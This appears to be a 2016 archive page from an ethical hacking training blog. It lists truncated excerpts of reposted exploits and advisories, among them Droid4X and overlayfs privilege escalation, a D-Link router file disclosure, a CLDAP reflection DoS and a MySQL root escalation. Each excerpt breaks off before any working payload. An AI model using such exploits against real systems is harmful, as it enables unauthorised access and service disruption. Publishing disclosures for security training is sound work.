Yearly Archives: 2016

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: CT-Zer0 Team
# Exploit Title: Droid4X Unquoted Service Path Privilege Escalation

# Category: local
# Vendor Homepage: http://www.droid4x.com/
# Software Link: http://dl.haima.me/download/DXDown/win/Z001/Droid4XInstaller.exe
# Tested on: Windows 7 x86/x64

1. Description

Droid4XService (Droid4XService.exe) installs as a service with
an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Todor Donev
#!/bin/sh
#
#  D-Link ADSL ROUTER DSL-2750E SEA_1.07
#  Remote File Disclosure
#
#  Modem Name:               DSL-2750E
#  Firmware Version:         SEA_1.07

#
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Marco Grassi

#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>
 
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif
 
long r;
 
 
int main(int argc, char **argv)
{
    while (1) {
        pid_t pid = fork();
 
        if […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credit: Todor Donev
#!/usr/bin/perl
#
#  MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon
#  (CLDAP “AD Ping”) query reflection DoS PoC
#

#
#  MS Windows Server 2016      
#
#  Description:
#  The attacker  sends a simple query to a vulnerable reflector
#  supporting the Connectionless LDAP […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Yakov Shafranovich
Summary

Android devices can be crashed forcing a halt and then a soft reboot
by downloading a large proxy auto config (PAC) file when adjusting the
Android networking settings. This can also be exploited by an MITM
attacker that can intercept and replace the PAC file. However, the […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: SkyLined
Synopsis
 
A specially crafted HTTP response can cause the CHttp­Header­Parser::Parse­Status­Line method in WININET to read data beyond the end of a buffer. The size of the read can be controlled through the HTTP response. An attacker that is able to get any application that uses WININET […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require “msf/core”
 
class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking
 
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
        ‘Name’           => ‘Overlayfs Privilege Escalation’,
        ‘Description’    => %q{
          This module attempts to exploit two different CVEs related to overlayfs.
          CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55
                                            3.16.0-25 […]

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Dawid
I. VULNERABILITY
————————-
 
MariaDB / MySQL / PerconaDB   –   Root Privilege Escalation
 
MySQL 
    <= 5.5.51
    <= 5.6.32
    <= 5.7.14
 
MariaDB
    All current
 
Percona Server
    < 5.5.51-38.2
    < 5.6.32-78-1
    < 5.7.14-8
 
Percona XtraDB Cluster
    < 5.6.32-25.17
    < 5.7.14-26.17
    < 5.5.41-37.0
 
 
II. BACKGROUND
————————-
 
MySQL:
 
“MySQL is the world’s most popular open source database.
Whether you are a fast growing web property, technology ISV or large
enterprise, MySQL […]